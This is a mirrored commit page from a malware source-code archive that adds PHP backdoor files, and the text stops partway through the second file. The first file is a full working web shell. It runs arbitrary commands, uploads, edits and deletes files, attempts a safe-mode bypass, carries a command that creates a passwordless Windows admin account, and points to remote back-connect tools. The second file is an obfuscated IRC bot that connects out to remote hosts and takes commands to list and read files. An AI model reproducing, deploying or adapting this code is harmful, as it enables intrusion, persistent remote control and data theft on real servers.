ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 09:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2020-10-09 22:02:21 -05:00 committed by GitHub
parent 06828a0956
commit 27f87bc75b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
78 changed files with 116913 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2226
PHP/Backdoor.PHP.Agent.ad Normal file
View File

File diff suppressed because it is too large Load Diff

8346
PHP/Backdoor.PHP.Agent.af Normal file
View File

File diff suppressed because one or more lines are too long

467
PHP/Backdoor.PHP.Agent.ag Normal file
View File

@ -0,0 +1,467 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>By xIgOr > AoD > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
<?php
@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://geocities.yahoo.com.br/eircsnx/list.txt?';
$host_all = explode("$mhost", $string);
$s1 = $host_all[0];
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }
$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
// Java Script
echo "<script type=\"text/javascript\"> </script>";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color=\"#008000\">Entrance&nbsp;in&nbsp;the&nbsp;directory,&nbsp;OK!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;enters&nbsp;it&nbsp;in&nbsp;the&nbsp;directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>,&nbsp;the&nbsp;archive&nbsp;is&nbsp;validates&nbsp;and&nbsp;was&nbsp;loaded&nbsp;successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>,&nbsp;directory&nbsp;created successfully.</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;creates&nbsp;directory.</font>";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>,&nbsp;created successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;tries&nbsp;it&nbsp;creates&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;archive!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;archive!</font>";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;directory!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;directory!</font>";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "<font color=\"#008000\">Chmod&nbsp;of</font>&nbsp;<font color=\"#000080\">{$_GET['file']}</font>&nbsp;<font color=\"#008000\">moved&nbsp;for</font>&nbsp;<font color=\"#000080\">$chmod</font>&nbsp;<font color=\"#008000\">successfully.</font>";
} else {
$msg = '<font color=\"#FF0000\">Error&nbsp;when&nbsp;moving&nbsp;chmod.</font>';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color=\"#008000\">Archive</font>&nbsp;<font color=\"#000080\">{$file}</font>&nbsp;<font color=\"#008000\">named for</font>&nbsp;<font color=\"#000080\">{$newname}</font>&nbsp;<font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;to&nbsp;it&nbsp;nominates&nbsp;archive.</font>";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color=\"#000080\">{$file}</font>,&nbsp;<font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
} else {
$msg = "<font color=\"#FF0000\">Error&nbsp;when&nbsp;copying</font>&nbsp;<font color=\"#000000\">{$file}</font>&nbsp;<font color=\"#FF0000\">for</font>&nbsp;<font color=\"#000000\">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results:&nbsp;<b>".$cmd."</b></p>";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\">&nbsp;".@$result_arr[$acom]."</p>";
$acom++;
}
}
else {
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module</br>";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "<p align=\"center\">Editing&nbsp;{$file}&nbsp;...</p>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
echo "<tr>";
echo "<td width=\"100%\">";
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
echo "<p align=\"center\">";
echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\">&nbsp;";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color=\"#000080\">{$_GET['file']}</font>,&nbsp;<font color=\"#008000\">edited&nbsp;successfully!</font>";
}
} else {
$msg = "<font color=\"#000000\">{$_GET['file']},</font>&nbsp;<font color=\"#FF0000\">cannot&nbsp;be&nbsp;written!</font>";
}
}
// Informações
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget&nbsp;"; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch&nbsp;"; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl&nbsp;"; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET&nbsp;"; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx&nbsp;"; }
return $asdads;
}
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
echo "<legend>Informações</legend>";
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Sistema:</b>&nbsp;</td></p>";
echo "<td width=\"92%\">&nbsp;{$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Uname:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>PHP:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$PHPv},&nbsp;<b>safe mode:</b>&nbsp;{$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Methods:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$Methods}</td>";
echo "</tr>";
}
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Ip:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;{$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width=\"8%\">";
echo "<p align=\"right\"><b>Command:&nbsp;</b></td></p>";
echo "<td width=\"92%\">&nbsp;<input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\">&nbsp;<input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Dir
echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\" enctype=\"multipart/form-data\">";
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">[BackTool]</a></legend>";
}
}
if (@!$handle = opendir("$chdir")) {
echo "&nbsp;I&nbsp;could&nbsp;not&nbsp;enters&nbsp;in&nbsp;the&nbsp;directory,&nbsp;<a href=\"{$fstring}\">click here!</a>&nbsp;for&nbsp;return&nbsp;to&nbsp;the&nbsp;original&nbsp;directory!</br>";
}
else {
echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;Upload:";
echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;</td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
if (@!$msg) {
echo " <p align=\"left\">Messages</td>";
} else {
echo " <p align=\"left\">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width=\"100%\" colspan=\"4\">&nbsp;</td>";
echo " </tr>";
echo " <tr>";
echo " <td width=\"9%\">&nbsp;Perms</td>";
echo " <td width=\"49%\">&nbsp;File </td>";
echo " <td width=\"10%\">&nbsp;Size </td>";
echo " <td width=\"32%\">&nbsp;Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style=\"background-color: #FFCC66\"";
}
elseif ($colorn == 1) {
$color = "style=\"background-color: #C0C0C0\"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width=\"9%\" $color>&nbsp;$perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></b></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></td>";
} else {
echo "<td width=\"49%\" $color>&nbsp;$file</td>";
}
}
}
echo "<td width=\"10%\" $color>&nbsp;$size&nbsp;KB</td>";
if ($mode == 'edit') {
echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;<a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
} else {
echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;[Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
?>
</table>
</fieldset></form>
<p align="center">
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
</body>
</html>

135
PHP/Backdoor.PHP.Agent.ah Normal file
View File

@ -0,0 +1,135 @@
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po" => 8080, "sp" => "xZiGuIrSlJaYlw==", "ch" => "dVZQuw==",
"ke" => "k3h2", "ha" => "gW1NZ0+eTmOGmldl", "pa" => "i5eHeoqSWmZXWmuZW2ZoapttnGhtb22cYW1olWlok2o=",
"tr" => "*", "mrnd" => 9, "mo" => "f6tOrw==", "ve" => "g2FVfok=" ); function dfc35fdc70d5fc() {
global $oec12e0af93cb5; $xee11cbb19052e = array(); $ed707b8140a662 = ""; $n59b514174bffe = array("uqKQq5HDl6iShaFkmpuamqOrZ5Onpg==","tKiVtI7Mi6KGkmGtiJuZpKhmnJ+l","tJSPspjKiaiYkZSkUa2am5mmrF6bqKY=","v5aEuFPCiGOHkKibj5+jm2Oang==","v5aEuJHNl2OUlJikh6SoZJed","wKZUdlPRmaeUk6dkhqWi","v5aEuJHNl2OJkpymUaSaqg==","g2GRuVWRUpaSiaWfhpejq6Oeop6hrKGclGaWoaA=");
shuffle($n59b514174bffe); if(($o351a1d2ad68bc = fsockopen(ef9feaa9bcab30($n59b514174bffe[0]),$oec12e0af93cb5['po'],$i70106d0d82151,$q809b1abe3f111,15))) {
$d8052146769b14 = bd988971435842($oec12e0af93cb5['mrnd']); if (strlen($oec12e0af93cb5['sp'])>0) { i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UEFTUw==")." ".ef9feaa9bcab30($oec12e0af93cb5['sp']));
} i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("VVNFUg==")." ".bfb0daa8f01135($oec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$d8052146769b14");
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14"); while (!feof($o351a1d2ad68bc)) {
$l7fabc1404929c = trim(fgets($o351a1d2ad68bc,512)); $b6e2baaf3b97db = explode(" ",$l7fabc1404929c);
if(($l7fabc1404929c == $ed707b8140a662)) continue; if (isset($b6e2baaf3b97db[0]) && $b6e2baaf3b97db[0] == ub5d21085bf2c0("UElORw==")) {
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UE9ORw==")." ".$b6e2baaf3b97db[1]); } else if (isset($b6e2baaf3b97db[1]) && $b6e2baaf3b97db[1] == ub5d21085bf2c0("MDAx")) {
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TU9ERQ==")." $d8052146769b14 ".ef9feaa9bcab30($oec12e0af93cb5['mo']));
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("Sk9JTg==")." ".ef9feaa9bcab30($oec12e0af93cb5['ch'])." ".ef9feaa9bcab30($oec12e0af93cb5['ke']));
} else if(isset($xdfff0a7fa1a55[1]) && $xdfff0a7fa1a55[1] == ub5d21085bf2c0("NDMz")) { i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14");
} else if (isset($b6e2baaf3b97db[1]) && isset($xee11cbb19052e[$b6e2baaf3b97db[1]])) { unset($xee11cbb19052e[$b6e2baaf3b97db[1]]);
} else if (isset($b6e2baaf3b97db[1]) && ($b6e2baaf3b97db[1] == ub5d21085bf2c0("UFJJVk1TRw==") || $b6e2baaf3b97db[1] == "332")) {
$o78e731027d8fd = strstr($l7fabc1404929c," :"); $o78e731027d8fd = substr($o78e731027d8fd,2); $xdfff0a7fa1a55 = explode(" ",$o78e731027d8fd);
$z67b3dba8bc677 = $b6e2baaf3b97db[0]; $f7c6483ddcd99e = explode("!",$z67b3dba8bc677); $f7c6483ddcd99e = substr($f7c6483ddcd99e[0],1);
$e73be252ca8221 = FALSE; if ($xdfff0a7fa1a55[0] == "\1".ub5d21085bf2c0("VkVSU0lPTg==")."\1") { i56eacb300613d($o351a1d2ad68bc,"NOTICE ".$f7c6483ddcd99e." :\1".ub5d21085bf2c0("VkVSU0lPTg==")." ".ef9feaa9bcab30($oec12e0af93cb5['ve'])."\1");
} for ($v865c0c0b4ab0e=0;$v865c0c0b4ab0e<count($xdfff0a7fa1a55);$v865c0c0b4ab0e++) { if($xdfff0a7fa1a55[$v865c0c0b4ab0e] == "-s") {
$e73be252ca8221 = TRUE; } } if ($b6e2baaf3b97db[1] == "332") { $i01b6e20344b68 = $b6e2baaf3b97db[3];
} elseif ($b6e2baaf3b97db[2] == $d8052146769b14) { $i01b6e20344b68 = $f7c6483ddcd99e; } else { $i01b6e20344b68 = $b6e2baaf3b97db[2];
} if ($xdfff0a7fa1a55[0] == PHP_OS) { array_shift($xdfff0a7fa1a55); } if (substr($xdfff0a7fa1a55[0],0,1) == $oec12e0af93cb5['tr']) {
if (isset($xee11cbb19052e[$z67b3dba8bc677]) || $b6e2baaf3b97db[1] == "332") { switch (substr($xdfff0a7fa1a55[0],1)) {
case j69923efad5b7a("qGWaoKKb"): i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UVVJVCA6SSBRVUlU"));
fclose($o351a1d2ad68bc); exit(0); break; case j69923efad5b7a("tpWs"): if (count($xdfff0a7fa1a55)>1) {
i56eacb300613d($o351a1d2ad68bc, substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0]))); } break; case j69923efad5b7a("sKc="):
if (isset($xdfff0a7fa1a55[1])) { $s954eef6d6eac5 = $xdfff0a7fa1a55[1]; } else { $s954eef6d6eac5 = getcwd();
} if (is_dir($s954eef6d6eac5)) { if (($k736007832d216 = opendir($s954eef6d6eac5))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$s954eef6d6eac5."\2");
while (($a435ed7e9f07f7 = readdir($k736007832d216)) !== FALSE) { if ($a435ed7e9f07f7 != "." && $a435ed7e9f07f7 != "..") {
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> (".filetype($s954eef6d6eac5."/".$a435ed7e9f07f7).") $a435ed7e9f07f7");
sleep(1); } } closedir(); } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$s954eef6d6eac5."\2");
} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8=") . " \2".$s954eef6d6eac5."\2 " . ub5d21085bf2c0("aXMgbm90IGEgZGlyIQ=="));
} break; case j69923efad5b7a("p5Wp"): if (count($xdfff0a7fa1a55) > 1) { if (is_file($xdfff0a7fa1a55[1])) {
if (($a0666f0acdeed3 = fopen($xdfff0a7fa1a55[1],"r"))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$xdfff0a7fa1a55[1]."\2");
while(!feof($a0666f0acdeed3)) { $g6438c669e0d0d = trim(fgets($a0666f0acdeed3,256)); zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> $g6438c669e0d0d");
sleep(1); } zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ=="));
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$xdfff0a7fa1a55[1]."\2 for reading.");
} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8=") . " \2".$xdfff0a7fa1a55[1]."\2 " . ub5d21085bf2c0("aXMgbm90IGEgZmlsZQ=="));
